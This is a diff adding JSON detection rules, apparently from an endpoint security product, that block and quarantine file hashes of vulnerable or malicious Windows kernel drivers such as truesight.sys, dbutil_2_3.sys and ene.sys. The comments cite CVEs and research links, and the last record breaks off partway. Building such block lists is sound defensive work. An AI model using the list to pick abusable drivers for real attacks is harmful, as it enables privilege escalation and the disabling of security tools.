+{
+ "id": "7ba38b3b-9fc0-589b-b36e-523c78d73de9",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.474814Z",
+ "creation_date": "2026-03-23T11:45:31.474818Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.474828Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "c80868601bc7d351f0739bfa5080bec3a3796e6414e7ceb14238e1f6a5adad52",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "7ba58b9d-a747-561c-b4c1-9338d25425ff",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.984052Z",
+ "creation_date": "2026-03-23T11:45:29.984055Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.984060Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "a82d08ef67bdfccf0a2cf6d507c9fbb6ac42bd74bf2ade46ec07fe253deb6573",
+ "comment": "Vulnerable Kernel Driver (aka SysInfo.sys) [https://www.loldrivers.io/drivers/84ccb68d-ce34-4aa2-98d5-7f473c2e1b07/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "7ba98854-e81b-5732-9a0a-58bacc59d156",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.487125Z",
+ "creation_date": "2026-03-23T11:45:31.487127Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.487132Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "20cf6c47a4f35f5b1d23f726323ea9de093dc6c76b8f83950fdf71802e51a5e0",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "7bc4d7bf-3147-5613-9468-b34104232fb0",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:32.145990Z",
+ "creation_date": "2026-03-23T11:45:32.145992Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:32.145998Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "0a6366066bc6003f347eadc6fe6c8994fded09fb7d5d24d0ddac3936ae1437a7",
+ "comment": "Malicious Kernel Driver (aka driver_0a636606.sys) [https://www.loldrivers.io/drivers/82087b26-b649-4ad1-a353-3a225c757ff7/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "7bcb2eaa-9dd8-5570-845d-2d5dd351906d",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.492408Z",
+ "creation_date": "2026-03-23T11:45:31.492410Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.492419Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "316bbde0484b82f35e1169104a7f155bc363aca7a511e9e117a14a4b6960fc61",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "7bf437bf-ea92-525d-88ed-cb6f07d0b596",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.481679Z",
+ "creation_date": "2026-03-23T11:45:31.481683Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.481692Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "792b70d8d3c67791e524a699461526a17f79bddc4a6b2f3753373fcc44b20cca",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "7bff1a91-091f-582c-b6e6-6aa1f1c2865c",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.615520Z",
+ "creation_date": "2026-03-23T11:45:29.615522Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.615527Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "98f5cb928827e8dadc79c1be4f27f67755dbeb802c3485af9cace78b9eb65c59",
+ "comment": "MICRO-STAR vulnerable drivers (aka NBIOLib_X64.sys, NTIOLib_X64.sys, NTIOLib.sys and NBIOLib.sys) [CVE-2021-44899] [http://blog.rewolf.pl/blog/?p=1630] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "7bffff0f-b5ae-5058-abb5-ff66b6f478c1",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.499957Z",
+ "creation_date": "2026-03-23T11:45:31.499960Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.499969Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "ecdde68b3e543dee38dcccf9be2e180ffdb0feab69cc3ccb4e0b97f81cd14f51",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "7c00cebd-5b5d-5844-b36e-8e9f50ed21d9",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.605340Z",
+ "creation_date": "2026-03-23T11:45:29.605342Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.605348Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "041604b952fd390eb6f23008ed2cb30dff4155d8854561719467b07ccf48702b",
+ "comment": "Process Hacker driver (aka kprocesshacker.sys) [https://processhacker.sourceforge.io/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "7c05d8d5-c3dd-54f4-bb12-0a3336ad0301",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.607147Z",
+ "creation_date": "2026-03-23T11:45:29.607149Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.607154Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "0296e2ce999e67c76352613a718e11516fe1b0efc3ffdb8918fc999dd76a73a5",
+ "comment": "Dell vulnerable driver (aka dbutil_2_3.sys) [CVE-2021-21551] [https://github.com/SpikySabra/Kernel-Cactus] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "7c088a97-8e38-52c0-a0d6-de5ac4bd0efe",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.830446Z",
+ "creation_date": "2026-03-23T11:45:31.830448Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.830454Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "01e8b9d3ab61de6d120ea4f99e362533a297c929519f7c4c3df06e707f52958d",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "7c09e0af-0d08-5e83-99d4-f4b9dea813a7",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.973112Z",
+ "creation_date": "2026-03-23T11:45:29.973114Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.973120Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "f276197c07995a51ab703f1c96bb9fc45db244c0c5ef8a2d160c6db6f3e38947",
+ "comment": "Elaborate Bytes vulnerable driver (aka ElbyCDIO.sys) [CVE-2009-0824] [https://www.loldrivers.io/drivers/855ade1f-8a9e-4c9d-ab8e-d7e409609852/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "7c0a3c6d-4f3b-5b50-84a5-33cbb7946bc7",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.147500Z",
+ "creation_date": "2026-03-23T11:45:31.147502Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.147508Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "9f444505502eaf2f1c0ef864b5e24f86d38a3c443244463eb003718eab66f35d",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "7c11dc99-ca07-50ed-8a7e-3ea7ae89a69d",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.826066Z",
+ "creation_date": "2026-03-23T11:45:31.826068Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.826074Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "cd2a2a3ce64c455ade0980cc9c5100593f27b6ecdda33bba51884412f011bdb8",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "7c124c64-059e-5c55-b584-e4bbe08dc6b7",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.615867Z",
+ "creation_date": "2026-03-23T11:45:29.615880Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.615885Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "2018ad5f3695295599f756caf556722291485cd67eb9c3f7ec701b206cca4e00",
+ "comment": "MICRO-STAR vulnerable drivers (aka NBIOLib_X64.sys, NTIOLib_X64.sys, NTIOLib.sys and NBIOLib.sys) [CVE-2021-44899] [http://blog.rewolf.pl/blog/?p=1630] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "7c1695f6-5324-5704-ba5e-1e5964685563",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.830205Z",
+ "creation_date": "2026-03-23T11:45:30.830207Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.830212Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "39665ac910c4ed6526bc92452d231f752289db6dc324de6c4ba6e8693bf15f00",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "7c19ecb4-9bff-53b8-b119-28d42709d3c8",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.968221Z",
+ "creation_date": "2026-03-23T11:45:29.968223Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.968228Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "38c18db050b0b2b07f657c03db1c9595febae0319c746c3eede677e21cd238b0",
+ "comment": "ENE Technology Inc Vulnerable I/O Driver (aka ene.sys) [https://swapcontext.blogspot.com/2020/08/ene-technology-inc-vulnerable-drivers.html] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "7c1de419-13c2-52db-bf7f-034f1e538aea",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.832986Z",
+ "creation_date": "2026-03-23T11:45:30.832989Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.832997Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "45298a81ff6b22e7f578f939559bac22a9ed907e0e64550a623903de6ecec98e",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "7c1fb99f-5a5c-5654-9f6a-4619a0313abc",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.836029Z",
+ "creation_date": "2026-03-23T11:45:30.836031Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.836037Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "674a250422906f220f76af3631cf093ea1db13b47401f0f0cd66c484186829c2",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "7c27d188-6bb8-5537-b22c-f75383a2d319",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.461211Z",
+ "creation_date": "2026-03-23T11:45:30.461214Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.461223Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "af10796af9886b896de11d9067ed2b1569e48e0a5a8cacbc06bc50a533d8bec8",
+ "comment": "Vulnerable Kernel Driver (aka sfdrvx32.sys) [https://www.loldrivers.io/drivers/6c0c60f0-895d-428a-a8ae-e10390bceb12/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "7c29ae6f-588d-5484-b6d7-73e40ba1f4d9",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.616496Z",
+ "creation_date": "2026-03-23T11:45:29.616499Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.616507Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "fda506e2aa85dc41a4cbc23d3ecc71ab34e06f1def736e58862dc449acbc2330",
+ "comment": "American Megatrends vulnerable BIOS flash tool (aka UCOREW64.SYS and amifldrv64.sys) [https://www.loldrivers.io/drivers/a338a9fc-9fe3-400c-9fe4-69bb7892602d/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "7c37fe24-c1ed-530c-aa17-90d2a263e0b9",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.159943Z",
+ "creation_date": "2026-03-23T11:45:31.159952Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.159961Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "61401cb144607a6d805877ef659049461afc2376351011206b34216d743dce63",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "7c3b76f4-4456-5169-8852-bdc4b34182d6",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
